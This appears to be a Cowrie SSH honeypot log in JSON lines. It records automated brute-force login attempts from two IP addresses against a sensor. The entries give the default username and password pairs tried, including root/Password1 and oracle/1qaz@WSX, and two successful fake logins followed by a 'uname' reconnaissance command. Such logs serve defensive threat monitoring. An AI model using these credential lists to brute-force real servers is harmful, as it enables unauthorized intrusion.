{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:58:30.298885Z","src_ip":"212.227.125.160","session":"9ab67a64ef4f"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:58:30.973345Z","src_ip":"212.227.125.160","session":"9ab67a64ef4f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:32.200287Z","src_ip":"212.227.125.160","session":"9ab67a64ef4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53572,"dst_ip":"1.2.3.4","dst_port":22,"session":"880602118bbe","protocol":"ssh","message":"New connection: 212.227.235.229:53572 (1.2.3.4:22) [session: 880602118bbe]","sensor":"my-vps","timestamp":"2025-08-28T06:58:36.602233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:58:36.603009Z","src_ip":"212.227.235.229","session":"880602118bbe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:58:36.848975Z","src_ip":"212.227.235.229","session":"880602118bbe"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:58:37.589053Z","src_ip":"212.227.235.229","session":"880602118bbe"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:38.836912Z","src_ip":"212.227.235.229","session":"880602118bbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49486,"dst_ip":"1.2.3.4","dst_port":22,"session":"65a43c194685","protocol":"ssh","message":"New connection: 212.227.125.160:49486 (1.2.3.4:22) [session: 65a43c194685]","sensor":"my-vps","timestamp":"2025-08-28T06:58:46.473122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:58:46.474018Z","src_ip":"212.227.125.160","session":"65a43c194685"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:58:46.689306Z","src_ip":"212.227.125.160","session":"65a43c194685"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:58:47.333169Z","src_ip":"212.227.125.160","session":"65a43c194685"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:58:47.779224Z","src_ip":"212.227.125.160","session":"65a43c194685"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:58:47.779932Z","src_ip":"212.227.125.160","session":"65a43c194685"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:47.994950Z","src_ip":"212.227.125.160","session":"65a43c194685"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:47.996182Z","src_ip":"212.227.125.160","session":"65a43c194685"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34298,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d0a7c0e6317","protocol":"ssh","message":"New connection: 212.227.235.229:34298 (1.2.3.4:22) [session: 2d0a7c0e6317]","sensor":"my-vps","timestamp":"2025-08-28T06:58:53.025192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:58:53.026333Z","src_ip":"212.227.235.229","session":"2d0a7c0e6317"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:58:53.273151Z","src_ip":"212.227.235.229","session":"2d0a7c0e6317"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:58:54.017145Z","src_ip":"212.227.235.229","session":"2d0a7c0e6317"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:58:54.599534Z","src_ip":"212.227.235.229","session":"2d0a7c0e6317"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:58:54.600321Z","src_ip":"212.227.235.229","session":"2d0a7c0e6317"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:54.848947Z","src_ip":"212.227.235.229","session":"2d0a7c0e6317"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:54.849948Z","src_ip":"212.227.235.229","session":"2d0a7c0e6317"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51022,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dcb64317c97","protocol":"ssh","message":"New connection: 212.227.125.160:51022 (1.2.3.4:22) [session: 9dcb64317c97]","sensor":"my-vps","timestamp":"2025-08-28T06:59:01.670961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:59:01.672256Z","src_ip":"212.227.125.160","session":"9dcb64317c97"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:59:01.760116Z","src_ip":"212.227.125.160","session":"9dcb64317c97"}
{"eventid":"cowrie.login.failed","username":"luis","password":"luis","message":"login attempt [luis/luis] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:02.166770Z","src_ip":"212.227.125.160","session":"9dcb64317c97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47596,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa8a579b7adb","protocol":"ssh","message":"New connection: 212.227.125.160:47596 (1.2.3.4:22) [session: fa8a579b7adb]","sensor":"my-vps","timestamp":"2025-08-28T06:59:02.987811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:59:02.992593Z","src_ip":"212.227.125.160","session":"fa8a579b7adb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:59:03.199435Z","src_ip":"212.227.125.160","session":"fa8a579b7adb"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abc123","message":"login attempt [luis/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:03.252374Z","src_ip":"212.227.125.160","session":"9dcb64317c97"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:04.051925Z","src_ip":"212.227.125.160","session":"fa8a579b7adb"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abcd123","message":"login attempt [luis/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:04.335502Z","src_ip":"212.227.125.160","session":"9dcb64317c97"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:59:05.265925Z","src_ip":"212.227.125.160","session":"fa8a579b7adb"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abcd1234","message":"login attempt [luis/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:05.417818Z","src_ip":"212.227.125.160","session":"9dcb64317c97"}
{"eventid":"cowrie.login.failed","username":"luis","password":"abc1234","message":"login attempt [luis/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:06.500194Z","src_ip":"212.227.125.160","session":"9dcb64317c97"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:59:07.583612Z","src_ip":"212.227.125.160","session":"9dcb64317c97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40986,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b3eb48c6d35","protocol":"ssh","message":"New connection: 212.227.235.229:40986 (1.2.3.4:22) [session: 3b3eb48c6d35]","sensor":"my-vps","timestamp":"2025-08-28T06:59:09.726017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:59:09.727206Z","src_ip":"212.227.235.229","session":"3b3eb48c6d35"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:59:09.978256Z","src_ip":"212.227.235.229","session":"3b3eb48c6d35"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:11.377568Z","src_ip":"212.227.235.229","session":"3b3eb48c6d35"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:59:12.631572Z","src_ip":"212.227.235.229","session":"3b3eb48c6d35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49580,"dst_ip":"1.2.3.4","dst_port":22,"session":"e38ad214b19b","protocol":"ssh","message":"New connection: 212.227.125.160:49580 (1.2.3.4:22) [session: e38ad214b19b]","sensor":"my-vps","timestamp":"2025-08-28T06:59:19.526964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:59:19.527893Z","src_ip":"212.227.125.160","session":"e38ad214b19b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:59:19.750411Z","src_ip":"212.227.125.160","session":"e38ad214b19b"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:20.414375Z","src_ip":"212.227.125.160","session":"e38ad214b19b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:59:21.639748Z","src_ip":"212.227.125.160","session":"e38ad214b19b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33608,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dd88606e7e3","protocol":"ssh","message":"New connection: 212.227.235.229:33608 (1.2.3.4:22) [session: 6dd88606e7e3]","sensor":"my-vps","timestamp":"2025-08-28T06:59:26.181974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:59:26.182819Z","src_ip":"212.227.235.229","session":"6dd88606e7e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:59:26.429004Z","src_ip":"212.227.235.229","session":"6dd88606e7e3"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-28T06:59:27.169282Z","src_ip":"212.227.235.229","session":"6dd88606e7e3"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:59:28.417115Z","src_ip":"212.227.235.229","session":"6dd88606e7e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51710,"dst_ip":"1.2.3.4","dst_port":22,"session":"41fe2248ee6a","protocol":"ssh","message":"New connection: 212.227.125.160:51710 (1.2.3.4:22) [session: 41fe2248ee6a]","sensor":"my-vps","timestamp":"2025-08-28T06:59:36.027417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:59:36.045984Z","src_ip":"212.227.125.160","session":"41fe2248ee6a"}
